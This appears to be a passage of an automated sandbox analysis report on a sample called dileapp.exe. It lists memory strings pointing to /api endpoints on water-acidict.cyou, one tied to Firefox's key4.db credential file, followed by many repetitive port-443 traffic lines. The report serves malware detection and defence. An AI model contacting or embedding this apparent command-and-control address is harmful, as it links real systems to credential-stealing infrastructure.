                Source: dileapp.exe, 00000009.00000003.1912600429.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/Z
                Source: dileapp.exe, 0000000F.00000003.2132494268.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/api
                Source: dileapp.exe, 00000009.00000002.1969913350.000000000098F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.000000000098F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apiC
                Source: dileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2058810259.0000000000F5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apiS
                Source: dileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apiZ
                Source: dileapp.exe, 0000000F.00000003.2103253174.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133309995.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2124156785.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132117784.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132494268.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apia
                Source: dileapp.exe, 00000009.00000002.1970314600.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969357381.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apicu
                Source: dileapp.exe, 0000000C.00000003.1980496225.0000000006033000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1980557308.0000000006035000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apie
                Source: dileapp.exe, 0000000F.00000003.2103253174.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133309995.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2124156785.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132117784.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132494268.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apih
                Source: dileapp.exe, 00000009.00000003.1888558428.0000000000A06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apiq
                Source: dileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954874686.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apixd
                Source: dileapp.exe, 0000000F.00000003.2089184015.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2103253174.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133309995.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2124156785.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132117784.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2089255852.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132494268.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/apiz
                Source: dileapp.exe, 00000005.00000002.1749293398.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740124665.00000000015C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/b
                Source: dileapp.exe, 0000000C.00000003.1926780706.0000000001B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/p
                Source: dileapp.exe, 00000009.00000002.1970339338.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1968959051.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/r
                Source: dileapp.exe, 0000000C.00000003.1952649413.0000000001B0F000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954874686.0000000001B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/x
                Source: dileapp.exe, 00000005.00000002.1749293398.00000000015C2000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000003.1740124665.00000000015C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou/z
                Source: dileapp.exe, 00000005.00000003.1740218351.0000000001551000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000005.00000002.1749018639.0000000001551000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1969012358.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.2050545971.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133021309.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/api
                Source: dileapp.exe, 00000009.00000003.1969012358.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.0000000000978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/api.
                Source: dileapp.exe, 0000000C.00000003.2050545971.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/api.default-release/key4.dbPK
                Source: dileapp.exe, 0000000C.00000003.2050545971.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000002.2052375189.0000000001A98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/apiK
                Source: dileapp.exe, 0000000F.00000002.2133021309.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/api_
                Source: dileapp.exe, 00000009.00000003.1969012358.0000000000978000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 00000009.00000002.1969913350.0000000000978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/apil
                Source: dileapp.exe, 0000000F.00000002.2133021309.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000ED8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://water-acidict.cyou:443/apitPK
                Source: dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2132165164.0000000000F4B000.00000004.00000020.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000002.2133194684.0000000000F4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: dileapp.exe, 00000009.00000003.1862666333.0000000005823000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954995924.000000000601B000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: dileapp.exe, 00000009.00000003.1811892713.00000000057F8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 00000009.00000003.1811747745.000000000585E000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901185611.000000000605C000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1901451564.0000000005FF8000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983324065.0000000005C6A000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.1983533384.0000000005C08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: dileapp.exe, 00000009.00000003.1862319105.00000000058FF000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954354098.0000000006108000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: dileapp.exe, 00000009.00000003.1862319105.00000000058FF000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000C.00000003.1954354098.0000000006108000.00000004.00000800.00020000.00000000.sdmp, dileapp.exe, 0000000F.00000003.2034733390.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
